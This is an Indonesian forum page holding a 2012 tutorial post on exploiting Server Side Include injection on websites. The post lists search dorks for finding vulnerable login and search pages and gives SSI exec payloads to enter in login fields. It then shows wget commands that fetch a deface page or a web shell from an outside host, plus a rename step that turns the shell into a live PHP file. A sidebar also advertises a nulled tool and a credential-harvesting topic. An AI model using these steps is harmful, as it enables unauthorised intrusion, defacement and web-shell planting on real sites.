Pencarian
 
 

Display results as :
 


Rechercher Advanced Search

Latest topics
» solusi bau mulut
Sun Aug 17, 2014 3:40 am by wartasolusi

» akhirnya terjawab sudah masalah saya
Sun Oct 28, 2012 4:31 am by stokisherbal

» solusi bau mulut, napas, kurus/obesitas, kerusakan rambut
Wed Oct 17, 2012 4:18 pm by stokisherbal

» nulled CPA blaster
Wed Oct 17, 2012 12:15 pm by Admin

» Script Download Mp3 dari 4Shared [White Code]
Sun Sep 30, 2012 12:01 pm by mandala

» Backlink Pasang Ac Surabaya | Do follow blog - Infoac.info
Fri Sep 28, 2012 10:42 pm by mandala

» Backlink Service Ac Surabaya
Fri Sep 28, 2012 10:37 pm by mandala

» site:perawatanac.infoac.info
Wed Sep 26, 2012 1:31 am by mandala

» Auto Approve - Bakclink September 2012
Thu Aug 30, 2012 10:41 pm by mandala

» pemesanan id betting online
Wed Aug 29, 2012 2:40 pm by dragonbet77

» Dijual Segera Rumah Minimalis Siap Huni dan Hadap Timur | Surabaya
Tue Aug 28, 2012 9:23 pm by mandala

» Get Usernames And Passwords + Database By Google
Sun Aug 26, 2012 12:15 pm by mandala


SSI (server side include) injection, shell and deface Page uploading tutorial

Go down

SSI (server side include) injection, shell and deface Page uploading tutorial

Post by mandala on Tue Aug 07, 2012 4:11 am

SSI (Server Side Include) is a web application exploit, you can put your codes remotely to vulnerable websites.
Server Side Include allowed you to upload files in multi extensions, but
in .php extension you can't execute your shell, you have to rename
shell.txt to shell.php
Lets Begin ....

Dorks

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulnerability of websites enter these commands in Username and Password

<!--#echo var="DATE_LOCAL" -->
It Will show the Date

<!--#exec cmd="whoami"-->
It Will display which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
It Will show all files in the directory

<!-- #exec cmd="dir" --> (Windows)
It Will display all files in the directory

for example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
in username and password to view all files of website

Now we have to upload our Deface page or Shell.
To upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in Username and Password
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
To view your Deface page goto site.com/deface.html

To upload a Shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget [You must be registered and logged in to see this link.]" -->
to check your txt file is uploaded or not list all files using

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
Now goto site.com/abc.php and acess your shell Smile
Live demo
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]

(Please don't harm to site upload your files for test only ! Thanks )
avatar
mandala

Jumlah posting : 86
Points : 639193
Reputation : 3
Join date : 16.12.10

Lihat profil user

Kembali Ke Atas Go down

Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik